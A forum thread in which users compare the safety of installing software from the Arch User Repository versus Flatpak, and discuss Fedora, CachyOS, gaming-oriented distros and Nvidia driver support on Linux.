Fedora with native + flatpak packages, CachyOS with native + AUR packages

How safe is using the AUR compared to Flatpak? I’m a long-time CachyOS user and recently found that many Linux apps I’ve come across aren’t popular in the AUR. Should I still download them from the AUR, or is it better to use Flatpak in such cases? After all, Flatpak has both officially supported and community-maintained apps. I’ve never actually checked the PKGBUILDs for AUR software; if an app was popular, I just downloaded what I needed. Is there a risk of getting something malicious on my PC this way?

Does anyone here have experience with Fedora or Arch distros? Which do you find more stable, faster, and generally prefer? Do you use Flatpak or the AUR? I’ve heard some Fedora users go with native packages + Flatpak, while Arch users often use native + AUR, or sometimes Flatpak.

1 Like

Is there a risk of getting something malicious on my PC this way?

Yes. There is always a risk of getting malware or outdated packages from the AUR. Thankfully, your AUR-helper (like Yay) will notify you if the package is outdated most of the time.

The same can be said for community-maintained flatpaks as well, so this is not a case of whether Flatpaks or the AUR is better than the other. It’s up to you to make the due diligence needed to vet the packages.

Does anyone here have experience with Fedora or Arch distros? Which do you find more stable, faster, and generally prefer? Do you use Flatpak or the AUR? I’ve heard some Fedora users go with native packages + Flatpak, while Arch users often use native + AUR, or sometimes Flatpak.

Naturally, Fedora is more stable than Arch since updates are less bleeding-edge. The best thing about Arch is the control it gives over your system. So, If I for some reason want a flatpak, I can easily install them any system including Arch. The only reason why people tend to associate flatpaks here with Fedora as it is the most recommended way of installing software on Fedora’s Atomic distributions (i.e. Silverblue, Bazzite, Kinoite). Otherwise, most regular users of Fedora rely on its built-in package manager.

4 Likes

So, on Fedora KDE or Workstation, is it better to use a mix of native packages and Flatpaks? Or is it feasible to rely solely on Flatpaks?

Native packages for web browsers and Flatpaks for everything else.

2 Likes

So, would you say Fedora KDE/Workstation is stable and hardly ever breaks? Also, I’ve often seen people recommend installing native OS packages first, unlike Flatpaks, because they’re supposedly highly optimized for the system, smaller, and perform better. Is it really recommended to install everything via Flatpak on Fedora, though?

Could only say this about Silverblue and Aeon because of their self-healing capabilities.

Yes, except for web browsers, you should install them natively.

2 Likes

Is it even better to install Steam as a flatpak?

In terms of both security and reliability/stability, I’d choose Flatpaks from Flathub over the AUR.

The AUR can be convenient for experienced DIY motivated users–particularly in the context of Arch where the official repos are quite small/limited compared to other distros–but for average users or anyone who wants to just use an OS casually, it’s a rather insecure/non-ideal model, since the security of the model depends on users reading pkgbuild files and doing their own vetting and due diligence (which most users don’t do).

Outright maliciousness is just one risk to consider. You aren’t just trusting random people to not be malicious, you are also trusting them to be semi-competent and semi-reliable and not negligent or irresponsible, and trusting an AUR package doesn’t become outdated or abandoned or cause conflicts, etc.

Should I still download them from the AUR, or is it better to use Flatpak in such cases?

In my eyes, If you don’t mind consistently vetting software yourself the AUR is pretty cool, but if you aren’t vetting the software yourself, the AUR should be pretty far down your order of preference if not close to a method of last resort.

If there is an official flatpak available I’d definitely choose that. If there is an unofficial flatpak on flathub available, I’d still probably prefer that to the AUR since inclusion on flathub implies at least some basic initial vetting was done by flathub volunteers, and due to flatpak’s intrinsic sandboxing capabilities. Like the AUR, it’s also possible to vet flatpaks yourself to some degree (the flatpak equivalent of a pkgbuild is the flatpak manifest).

So, on Fedora KDE or Workstation, is it better to use a mix of native packages and Flatpaks? Or is it feasible to rely solely on Flatpaks?

It is not feasible to rely on solely flatpaks with a traditional fedora install (since the base system is made up of roughly ~2000 traditional packages. But it may be possible to rely only on flatpaks for the software you install/add post install. If you want to maximize your use of flatpaks I think Fedora Atomic distros are a sensible option, but I’d personally prefer official Fedora RPM packages to unofficial flatpaks in most cases.

4 Likes

Yep.

Thank you very much for such a detailed answer. What do you say about Nobara, Bazzite distributions for games, or is it better to put Fedora Worksation/KDE, customize and use, because there I think it will be more reliable than using spin?

Or a system that is made by a small team cannot be safe, stable and well tested? If used as a universal system, sometimes for games. I have a laptop and nvidia card

Hint please, on a Nvidia graphics card laptop in Fedora Gnome is more polished than KDE?

Personally, unless maybe it’s a system intended solely or primarily for gaming, the small amount of potential convenience or the hypothetical small edge in performance of a “gaming” distro isn’t really a large enough reason for me to choose a distro like that over a solid general purpose distro like Fedora or OpenSUSE. Possibly exception would be Bazzite, since I’m attracted to it’s atomic nature, and have a generally positive opinion of Universal Blue as a project broadly. As I see it, the main benefit to a “gaming” distro is convenience if you want a gaming oriented OS out of the box, but that could come at the expense of other priorities, so to me, it is rarely worth it.

With that said, if I were to take off my privacy/security hat, and put on my linux hobbyist hat, I’d say that part of the fun and part of the learning experience of Linux is trying out the things that interest you, trying various distros, breaking things, fixing things, experimenting. Its part of the process and part of the fun. And if I were to choose a “gaming” distro the two you mentioned are probably the only two I’d consider.

Hint please, on a Nvidia graphics card laptop in Fedora Gnome is more polished than KDE?

Personally, I think that Gnome is just generally more polished than KDE regardless of hardware (KDE’s comparative advantage is its flexibility and customizability). I do not have a laptop with an Nvidia GPU, nor have I used Fedora KDE outside of a VM, so I can’t directly answer your question. With Nvidia, I’ve found Pop!_OS to be fairly hassle free, and I’d expect that would remain true for laptops with Nvidia GPUs since System76 (the developers of Pop!_OS) sell many laptops with Nvidia graphics.

1 Like

I heard CachyOS is running best on Nvidia right now or is that not true? That Fedora as well as openSuse doesn’t like Nvidia, that they supposedly run best on AMD, or is that not true? Is there a difference between how Gnome or KDE runs on Fedora with Nvidia?

That Fedora as well as openSuse doesn’t like Nvidia, that they supposedly run best on AMD, or is that not true?

My understanding is that AMD drivers are open source and included in the Linux Kernel. Regardless of the distro you choose, AMD tends to be less problematic than Nvidia’s proprietary drivers (though Nvidia has been making some positive steps more recently).

That Fedora as well as openSuse doesn’t like Nvidia,

Not sure what is meant by that. Best guess is it is a misinterpretation of something like “Fedora and OpenSUSE don’t like closed source software” and don’t pre-install closed source software like the Nvidia driver by default."

You must install the drivers manually, but realistically, that is mostly just a small difference in convenience not performance or capability. Also worth noting that, both of the gaming oriented distros you mentioned earlier (Nobara and Bazzite) deliberately chose to build on Fedora.

I don’t know, I don’t have any firsthand (or secondhand) knowledge about that. But I assume if there is substantial truth to it, there would be publicly available empirical evidence and specifics to support the claim, and whatever innovation would eventually be upstreamed or adopted by other distros (if it were a substantial improvement and didn’t have negative tradeoffs).

In my experience, at any given moment there are usually a few distros getting hype for being “optimized for gaming” or “optimized for Nvidia” or being theoretically “Faster”, in my experience any differences are usually modest and often not very perceivable or impactful in practice, and these ‘flavor of the month’ distros rise and fall in popularity/hype every few years. Maybe I’m just being a little too jaded but I tend to tune out the ‘flavor of the month’ distros and circle back to them if they are still around and relevant once the hype subsides. I’ve kind of perceived Cachy to be in that category but I could be dead wrong about that, it isn’t something I’ve looked into, just an unformed impression. It’s definitely a generalization, and for every generalization there will be exceptions. So take my impression with a grain of salt.

If you want to try a few different distros and see what works for you, on your own hardware Ventoy is a useful tool that makes that easier. In my eyes, experimenting and exploring is a big part of what makes Linux fun.

1 Like